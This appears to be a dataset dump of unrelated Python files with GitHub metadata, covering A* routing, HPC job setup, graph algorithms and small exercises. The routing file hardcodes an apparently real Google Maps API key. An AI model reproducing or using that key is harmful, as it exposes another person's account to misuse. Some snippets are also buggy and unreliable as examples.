Distance(Float) : Eucledian Distance between loc1,loc2
'''
lat_i = df.iloc[loc1]['latitude']
long_i = df.iloc[loc1]['longitude']
lat_j = df.iloc[loc2]['latitude']
long_j = df.iloc[loc2]['longitude']
lon_i = long_i.tolist()
lon_j = long_j.tolist()
lati = lat_i.tolist()
latj = lat_j.tolist()
x=(lati,lon_i)
y=(latj,lon_j)
#print (x,':',y)
return vincenty(x,y).miles
def trace_path(closed,start_dest,end_dest):
'''
Function to trace final path from start_dest and start_dest
Parameters:-
closed(List): Closed list consist of of all the considered nodes while running A* Algorithms
start_dest(int): Node_id of Starting Location
start_dest(int): Node_id of Ending Location
Returns
Path(list) : Series of Nodeid representing the Solution Path
lat(list) : Series of Latitudes representing the Solution Path
lon(list) : Series of Longitudes representing the Solution Path
'''
print (closed[len(closed)-1])
lat = []
lon = []
prev = end_dest
lat.append(df.iloc[end_dest]['latitude'])
lon.append(df.iloc[end_dest]['longitude'])
path = []
path.append(end_dest)
while len(closed)>0:
l = len(closed)
curr , temp = closed[l-1]
if curr == start_dest:
path.append(curr)
lat.append(df.iloc[curr]['latitude'])
lon.append(df.iloc[curr]['longitude'])
break
#print (prev,curr)
if a[prev][curr]>0:
if l >=2:
prev2,temp2 = closed[l-2]
if a[prev2][curr] < a[prev][prev2]:
closed.remove((curr,temp))
continue
path.append(curr)
lat.append(df.iloc[curr]['latitude'])
lon.append(df.iloc[curr]['longitude'])
prev = curr
closed.remove((curr,temp))
else:
closed.remove((curr,temp))
return path,lat,lon
def timefunc(y,i):
'''
Function to calculate time to reach from y to i using Google Metrics API
Parameters:-
y(int): Node_id of Starting Location
i(int): Node_id of Ending Location
Returns
Time(int) : Time taken to rreach from y to i in minutes
'''
start_dest=y
end_dest=i
start_lat = df.iloc[start_dest]['latitude']
start_lon = df.iloc[start_dest]['longitude']
end_lat = df.iloc[end_dest]['latitude']
end_lon = df.iloc[end_dest]['longitude']
key = 'AIzaSyBX13dsWgRGx5IDZPCq6JkJj6ud6qQm7EY'
URL = 'https://maps.googleapis.com/maps/api/distancematrix/json?units=metric&origins='
URL = URL + str(start_lat)+ ',' + str(start_lon) + '&destinations=' + str(end_lat)+ ',' + str(end_lon) + '&key=' + key
data = requests.get(URL).text
json_data = json.loads(data)
obj = json_data['rows'][0]['elements'][0]
print('distance', obj['distance']['text'])
print('time', obj['duration']['text'])
#print ((int(re.search(r'\d+', obj['duration']['text']).group())))
#int(re.search(r'\d+', string1).group())
return (int(re.search(r'\d+', obj['duration']['text']).group()))
'''
Adding the current path
'''
open1.append((compdis(start_dest,end_dest),start_dest))
g = np.zeros(len(a),dtype = np.float64)
total_time = np.zeros(len(a))
open2.append(start_dest)
path = []#Final Path
lat = []#list of latitudes
lon = []#list of longitudes
g[start_dest] = 0
total_time[start_dest] = 0
while len(open1)>0:
x,y = open1.pop()
#print (y)
if y==end_dest:
print ('Path Found');
path,lat,lon = trace_path(closed,start_dest,end_dest)#tracing path
break
else:
for i in range(len_listofplaces):
if a[y][i]!=0:
if i in open2: #Child is in open
for u,j in open1:
if j == i:
if u >(g[y] + a[y][i]+compdis(i,end_dest)):
open1.remove((u,j))
g[i] = g[y] + a[y][i] #Increasing g
#total_time[i] = total_time[y] + float(timefunc(y,i)) #calculating total time
open1.append(((g[i]+compdis(i,end_dest)),i)) #f = g + h(compdis)
else:
break
elif i in closed: #Child is in closed
for j in closed:
if j[0] == i:
if j[1]>(g[y] + a[y][i]+compdis(i,end_dest)):
closed.remove(j)
g[i] = g[y] + a[y][i] #Increasing g
#total_time[i] = total_time[y] + timefunc(y,i) #calculating total time
open1.append(((g[i]+compdis(i,end_dest)),i)) #f = g + h(compdis)
#heappush(open1,(a[y][i]+compdis(i,end_dest)))
open2.append(i)
else:
break
else: #Child is not open nor closed
g[i] = g[y] + a[y][i] #Increasing g
#total_time[i] = total_time[y] + timefunc(y,i) #calculating total time
open1.append(((g[i]+compdis(i,end_dest)),i)) #f = g + h(compdis)
#heappush(open1,(a[y][i]+compdis(i,end_dest)))
open2.append(i)
'''
Sorting the queue based on its score
'''
open1 = sorted(open1,reverse = True)
#print (open1)
closed.append((y,x)) #Considered Nodes goes into CLosed
#x = timefunc(start_dest,end_dest)
timefunc(start_dest,end_dest) # Calculating the total time
'''
Code Snippet to Map Solution on google maps
'''
gmap = gmplot.GoogleMapPlotter((lat[0]+lat[-1])/2, (lon[0]+lon[-1])/2, 12)
gmap.plot(lat, lon, 'cornflowerblue', marker=False, edge_width=7)
gmap.scatter(lat, lon, '#4444aa', size=180, marker=False)
gmap.scatter(lat, lon, '#FF0000', size=60, marker=True, c=None, s=None)
gmap.draw('map.html')
print (path)
| [
"noreply@github.com"
] | stgstg27.noreply@github.com |
832e473b8c911f7063df943d58fecbe31724ce10 | 2868a3f3bca36328b4fcff5cce92f8adeb25b033 | /+200ns/Ni_default/step1_dc/set.py | 23f82640e2dddefec72eb6201e99726773cd9099 | [] | no_license | linfranksong/TM-enzyme_input | 1c2a5e12e69c48febd5b5900aa00fe2339d42298 | 6e46a5b2c451efb93761707b77917a98ca0bfedc | refs/heads/master | 2022-03-19T19:49:09.373397 | 2019-12-04T00:11:59 | 2019-12-04T00:11:59 | 205,220,795 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,114 | py | import os
dir = os.path.dirname(os.path.realpath(__file__)) + '/'
for a in [150,200,250,300,350,400,450,500,550,600]:
#for a in [150]:
#for a in [200,250,300,350,400,450,500,550,600]:
os.system("rm -r %s_dc"%(a))
os.system("cp -r temp/ %s_dc"%(a))
adir=dir+ "%s_dc/"%(a)
os.chdir(adir)
os.system("sed -i 's/MMM/%s/g' */*pbs"%(a))
array= [0,0.00922, 0.04794, 0.11505, 0.20634, 0.31608, 0.43738, 0.56262, 0.68392, 0.79366, 0.88495, 0.95206, 0.99078,1.0]
for n in range(1,len(array)-1):
i=array[n]
os.system("rm -r %s"%(i))
os.system("cp -r files %s"%(i))
wdir=adir+"%s/"%(i)
os.chdir(wdir)
os.system("mv eq.in %s_eq.in"%(i))
os.system("mv us.in %s_us.in"%(i))
os.system("sed -i 's/XXX/%s/g' %s_eq.in"%(i,i))
os.system("sed -i 's/XXX/%s/g' %s_us.in"%(i,i))
os.system("sed -i 's/MMM/%s/g' dis.RST"%(a))
os.system("mv eq.pbs %s_eq.pbs"%(i))
os.system("mv us.pbs %s_us.pbs"%(i))
os.system("sed -i 's/XXX/%s/g' *.pbs"%(i))
os.system("sed -i 's/NNN/%s/g' *.pbs"%(array[n+1]))
os.system("sed -i 's/PPP/%s/g' *.pbs"%(array[n-1]))
os.chdir(adir)
sdir=adir+"0/"
os.chdir(sdir)
i=0
os.system("cp /mnt/gs18/scratch/users/songlin3/run/glx-0904/+200ns/Ni_default/step0_fep/%s_fep/1.0/%s_1.0_eq_center.rst ."%(a,a))
os.system("mv eq.in %s_eq.in"%(i))
os.system("mv us.in %s_us.in"%(i))
os.system("sed -i 's/XXX/%s/g' %s_eq.in"%(i,i))
os.system("sed -i 's/XXX/%s/g' %s_us.in"%(i,i))
os.system("mv eq.pbs %s_eq.pbs"%(i))
os.system("mv us.pbs %s_us.pbs"%(i))
os.system("sed -i 's/XXX/%s/g' *.pbs"%(i))
os.system("sed -i 's/MMM/%s/g' dis.RST"%(a))
os.system("sbatch 0_eq.pbs")
sdir=adir+"1.0/"
os.chdir(sdir)
i=1.0
os.system("mv eq.in %s_eq.in"%(i))
os.system("mv us.in %s_us.in"%(i))
os.system("sed -i 's/XXX/%s/g' %s_eq.in"%(i,i))
os.system("sed -i 's/XXX/%s/g' %s_us.in"%(i,i))
os.system("mv eq.pbs %s_eq.pbs"%(i))
os.system("mv us.pbs %s_us.pbs"%(i))
os.system("sed -i 's/XXX/%s/g' *.pbs"%(i))
os.system("sed -i 's/MMM/%s/g' dis.RST"%(a))
os.system("sed -i 's/MMM/%s/g' center.in"%(a))
os.chdir(dir)
| [
"songlin3@msu.edu"
] | songlin3@msu.edu |
6c42099ea62524284bf62ff510f59295cb222627 | 9de93d7a5f6bb6b21e729e569acd834765988212 | /py-manage-server/role_manager.py | 7f17cf52b930fc3a0ce039dc199222149e12ec88 | [
"Apache-2.0"
] | permissive | dkoudlo/py-manage-server | 50e14ea33313bdb6d9700bd82eb67aad97ad32cb | 812af40f94188df76dec085f85d958a5d83cd2ed | refs/heads/master | 2021-01-15T10:59:42.140783 | 2016-10-17T21:29:20 | 2016-10-17T21:29:20 | 68,629,765 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 769 | py | import config_file_manager
# get all roles
# returns a dictionary
def get_roles():
# load roles from ./configuration/roles/main.yml
return config_file_manager.get_roles_config()
# def parse_roles(roles):
# for role, playbooks in roles.iteritems():
# print "Applying role" + role + " since only one found!"
# for playbook in playbooks:
# # apply playbook
# print playbook
# print config_file_manager.get_playbook(playbook)
def get_role_playbooks(role_name):
if role_name in roles:
return config_file_manager.get_playbook(playbook)
# else:
# print "provided role name not fount"
# return empty[]
if __name__ == '__main__':
get_roles()
| [
"dkoudlo@gmail.com"
] | dkoudlo@gmail.com |
4f0f16b99a79f80182147aa4bf200e1caaa008c5 | e27c906d8321a7da1086a9e4cfd9ec102a456fd1 | /Python/qn1.py | 6ff08b3571b6904d9935bf7bfb7cd210e3230635 | [] | no_license | bhavykhatri/Computing-Laboratory | aa47ff2ccbc9565a373f7e3ee9ae659c1f5d6729 | 5f405dc9778bc42ba8ef3c6288a7f34e905e5ded | refs/heads/master | 2020-03-14T01:07:24.538762 | 2018-04-28T04:24:18 | 2018-04-28T04:24:18 | 131,370,939 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,167 | py | #!usr/bin/python
invalid=1
k=1
m=0
n=0
INPUT1 = raw_input("")
INPUT2 = float(input(""))
if 1<INPUT2<37:
invalid=1
else:
invalid=0
for i in range(len(INPUT1)):
if INPUT1[i]=='.':
k=0
if k==0:
devider_int_frac = str(INPUT1).split('.')
Fchild = devider_int_frac[1]
Ichild = devider_int_frac[0]
if len(devider_int_frac) > 2:
invalid=0
else:
Ichild = INPUT1
Fchild=str(0)
a=0
solution = 0
minus=1
if Ichild[0]=='-':
Ichild=Ichild[1:]
minus=0
Ichild=Ichild[::-1]
while m < len(Fchild):
if min(58,INPUT2+48)>ord(Fchild[m])>47:
a = ord(Fchild[m])-48
elif min(91,INPUT2+55)>ord(Fchild[m])>64:
a = ord(Fchild[m])-55
else:
invalid=0
break
solution += a*INPUT2**(-m-1)
m=m+1
while n < len(Ichild):
if min(58,INPUT2+48)>ord(Ichild[n])>47:
a = ord(Ichild[n])-48
elif min(91,INPUT2+55)>ord(Ichild[n])>64:
a = ord(Ichild[n])-55
else:
invalid=0
break
solution += a*INPUT2**(n)
n=n+1
if invalid==1 :
if minus==0 :
print -1*solution
else:
print solution
else:
print "INVALID INPUT"
| [
"bhavy@bhavy-HPbhavy@iitk.ac.in"
] | bhavy@bhavy-HPbhavy@iitk.ac.in |
d70479004635a01cf70e35ec5944a4c2a46c61b7 | ec68fde704c7562a0291f608b9638b9f0b8fd0f9 | /Stream Processing | Air Quality Control/Simulate.py | 1ccccc24ef15eeb09b4092c07aa0c4aed9d0f87b | [] | no_license | albedero/albedero.github.io | 112be540f5f4281493aab55e64977e0c02e2bf06 | d8610d601c2ff4c60bd4479af29960faee80db85 | refs/heads/main | 2023-04-21T20:21:54.721602 | 2021-05-06T15:13:20 | 2021-05-06T15:13:20 | 302,104,086 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,162 | py | from pyspark import SparkConf,SparkContext # from pyspark.conf import SparkConf
from pyspark.streaming import StreamingContext
from pyspark.sql import Row,SQLContext
import sys
#import kafka
import requests
from pyspark.streaming.kafka import KafkaUtils # ERROR
import json
import pandas as pd
import gspread
from gspread_dataframe import set_with_dataframe
from google.oauth2 import service_account
import re
import operator
import random
import time
new_csv = pd.read_csv("group_simulation.csv")
gc = gspread.service_account(filename='tweets-97ab5693ec9b.json') # Google API credentials
sh = gc.open_by_key('1dId7bMBrMCJsFGdIGuAL8Mzhpd7mCRgmnBg86eOYg54') # your_google_sheet_ID
sheet_index_no = 0
worksheet = sh.get_worksheet(sheet_index_no)
range_of_cells = worksheet.range('A2:E1000') #-> Select the range you want to clear
for cell in range_of_cells:
cell.value = ''
worksheet.update_cells(range_of_cells)
for i in range(len(new_csv)):
i2 = i*9+9
print(new_csv.iloc[i*9:i2,:])
set_with_dataframe(worksheet, new_csv.iloc[i*9:i2,:],row=2,include_column_header=False)
time_value = random.uniform(1, 2.5)
time.sleep(time_value)
| [
"noreply@github.com"
] | albedero.noreply@github.com |
393b04eb61b8b508a881983558631823f16dde28 | 8c5aa45df2598f8d0fd5553f7e0f1c5a1b8f81e9 | /PythonFiles/Unrelated Math/Volume13_4.py | 3c101fa1a864f5dc753024ab5235a87f495619e1 | [] | no_license | maxsolberg/CUAutomation | c08b6c2bb8a921e83ce7ff7fc0fec52a54089018 | 863c6ec796f279719ac558684955636bfe73d1d0 | refs/heads/master | 2021-05-02T13:50:27.068507 | 2018-05-20T19:51:33 | 2018-05-20T19:51:33 | 120,707,981 | 2 | 0 | null | 2018-02-08T04:33:34 | 2018-02-08T03:53:43 | null | UTF-8 | Python | false | false | 585 | py | # Volume via cross-products and determinants
# Created by Max Solberg
a= float(input("X-component of vector u: "))
b= float(input("Y-component of vector u: "))
c= float(input("Z-component of vector u: "))
d= float(input("X-component of vector v: "))
e= float(input("Y-component of vector v: "))
f= float(input("Z-component of vector v: "))
g= float(input("X-component of vector w: "))
h= float(input("Y-component of vector w: "))
i= float(input("Z-component of vector w: "))
j= (a*(e*i-f*h)+b*(f*g-d*i)+c*(d*h-e*g))
Volume= (str(j))
Answer= "The volume is " + Volume
print(Answer)
| [
"mrs372@cornell.edu"
] | mrs372@cornell.edu |
f8e6ec44ec47235fe1560d765b5b9f15f9ce3d81 | 158a725465bd079710a7ad12e6ab45b9f49cc273 | /lowestCommonNum.py | ba33f1aee473d968098c4d53a02f3e6eefdf406a | [] | no_license | AutoTestingGroup/PythonExample | 177a2db11732b7a633962fea90cf245627554926 | 3a2a804e4f8cdd9021d9dea2de52b6f7b423492a | refs/heads/master | 2020-05-21T03:00:07.945241 | 2019-05-16T10:47:49 | 2019-05-16T10:47:49 | 185,890,238 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 539 | py | # -*- coding: utf-8 -*-
# Filename lowestCommonNum.py Python 最小公倍数算法
# 定义函数
def lcm(x, y):
# 获取最大的数
if x > y:
greater = x
else:
greater = y
while (True):
if ((greater % x == 0) and (greater % y == 0)):
lcm = greater
break
greater += 1
return lcm
# 获取用户输入
num1 = int(input("输入第一个数字: "))
num2 = int(input("输入第二个数字: "))
print(num1, "和", num2, "的最小公倍数为", lcm(num1, num2)) | [
"legend919@163.com"
] | legend919@163.com |
807bd4413ac24f6180b70539c7ef6c6621b7e9db | 372185cd159c37d436a2f2518d47b641c5ea6fa4 | /142. 环形链表 II.py | 83c889995bd0403eefdbd90103e6fe0fd1b3b7b1 | [] | no_license | lidongze6/leetcode- | 12022d1a5ecdb669d57274f1db152882f3053839 | 6135067193dbafc89e46c8588702d367489733bf | refs/heads/master | 2021-07-16T09:07:14.256430 | 2021-04-09T11:54:52 | 2021-04-09T11:54:52 | 245,404,304 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 758 | py | class ListNode:
def __init__(self, x):
self.val = x
self.next = None
class Solution:
def detectCycle(self, head: ListNode) -> ListNode:
if head == None or head.next == None:
return None
fast = slow = head
temp = False # 记录是否有环
while fast.next and fast.next.next:
slow = slow.next
fast = fast.next.next
if fast == slow:
temp = True
break
if temp == True: # 若有环,则计算环起点位置
fast = head
while slow != fast:
slow = slow.next
fast = fast.next
return slow
return None # 若temp False 则无环,返回空
| [
"lidongze6@163.com"
] | lidongze6@163.com |
352380d8b64625551ab36200eabe6efe7099a2f5 | b9bac659cd8aa6c8eb60039c36bd0fd169099fe9 | /stronglyconnectedcomponents.py | 425ebcce124dd963f5a03d6c9ad5b1da15c25221 | [] | no_license | sAksham-Ar/Algorithms | 8e14e51ba07c8d9828f0cae2153bab3222316848 | 063e882ed56478aaec0d86e1b50b2f4be877e68c | refs/heads/master | 2023-01-24T04:51:48.973957 | 2020-12-04T13:01:47 | 2020-12-04T13:01:47 | 271,748,904 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,292 | py | # Copyright David Bai: Anyone can use this code without permission or referencing the original source
"""
W1 Kosaraju Algorithm
List Based Iterative Implementation to find sizes of strongly connected components
"""
########################################################
# Data Structures
# node labels range from 1 to 875714. 875715 was used because of the range operator... range(875715) goes up to 875714.
num_nodes = 1000001
# Adjacency representations of the graph and reverse graph
gr = [[] for i in range(2*num_nodes)]
r_gr = [[] for i in range(2*num_nodes)]
# The list index represents the node. If node i is unvisited then visited[i] == False and vice versa
visited = [0] *(2* num_nodes)
# The list below holds info about sccs. The index is the scc leader and the value is the size of the scc.
scc = [0] *(2* num_nodes)
leader = [0] *(2* num_nodes+1)
stack = [] # Stack for DFS
order = [] # The finishing orders after the first pass
########################################################
# Importing the graphs
file = open("2sat6.txt", "r") # I named the input file W1_SCC_edges.txt, but you can name it whatever you wish
data = file.readlines()
i=0
for line in data:
if i!=0:
items = line.split()
gr[-int(items[0])+num_nodes] += [int(items[1])+num_nodes]
gr[-int(items[1])+num_nodes] += [int(items[0])+num_nodes]
r_gr[int(items[0])+num_nodes] += [-int(items[1])+num_nodes]
r_gr[int(items[1])+num_nodes] += [-int(items[0])+num_nodes]
i=i+1
########################################################
# DFS on reverse graph
f=1
for node in range(2*num_nodes):
if visited[node]==False:
stack.append(node)
while stack:
stack_node=stack.pop()
if visited[stack_node]!=2:
stack.append(stack_node)
if visited[stack_node]==0:
visited[stack_node]=1
order.append(stack_node)
f=1
for head in r_gr[stack_node]:
if visited[head]==0:
f=0
visited[head]=1
stack.append(head)
if f==1:
visited[stack_node]=2
order.append(stack_node)
stack.pop()
########################################################
# DFS on original graph
visited = [0] * len(visited) # Resetting the visited variable
order.reverse() # The nodes should be visited in reverse finishing times
for node in order:
if visited[node]==0:
visited[node]=1
scc[node]=scc[node]+1
leader[node]=node
stack.append(node)
while stack:
stack_node=stack.pop()
for head in gr[stack_node]:
if visited[head]==0:
visited[head]=1
scc[node]=scc[node]+1
leader[head]=node
stack.append(head)
########################################################
# Getting the five biggest sccs
f=0
for i in range(num_nodes):
if leader[i]==leader[2*num_nodes-i] and scc[leader[i]]!=1:
f=1
break
if f==1:
print("nah")
scc.sort(reverse=True)
print(scc[:5]) | [
"noreply@github.com"
] | sAksham-Ar.noreply@github.com |
d8e84ed478a875c489750a51825632d3d1309f59 | 98383e62e61321f65450bb0fd901215ccbe6293b | /hanlp/components/coref/__init__.py | 83097d68d94078f4c9e9298921041daa3ced94cd | [
"Apache-2.0",
"CC-BY-NC-4.0",
"Python-2.0",
"CC-BY-NC-SA-4.0"
] | permissive | leobert-lan/HanLP | 155a66b5c93720abeb816616cb3b9ef4f7942e83 | 39c3ede99c3f99d7ea39bbbd470601dc7ef0ad62 | refs/heads/master | 2021-06-16T17:51:54.485767 | 2021-03-26T02:36:12 | 2021-03-26T02:36:12 | 178,836,942 | 1 | 0 | Apache-2.0 | 2021-03-26T02:36:13 | 2019-04-01T10:09:21 | Java | UTF-8 | Python | false | false | 64 | py | # -*- coding:utf-8 -*-
# Author: hankcs
# Date: 2020-07-05 19:56 | [
"jfservice@126.com"
] | jfservice@126.com |
32fe88969c29acd42125c481d6f2bd756033c283 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02685/s529348276.py | 65a166ca77210af61f1ce19dd156965d2e9ccf58 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 542 | py | mod=998244353
fact=[1]
for i in range(1,2*10**5+1): #mod上での階乗を求める
fact.append((fact[-1]*i)%mod)
revfact=[1]
for i in range(1,2*10**5+1): #mod上での階乗の逆元をフェルマーの小定理を用いて求める
revfact.append(pow(fact[i],mod-2,mod))
n,m,k=map(int,input().split())
ans=0
for i in range(k,-1,-1): #各m(N-K<=m<=N)について場合の数を求める
group=n-i
tmp=fact[n-1]*revfact[group-1]*revfact[n-1-(group-1)]
tmp%=mod
tmp*=m
tmp%=mod
tmp*=pow(m-1,group-1,mod)
ans+=tmp
ans%=mod
print(ans) | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.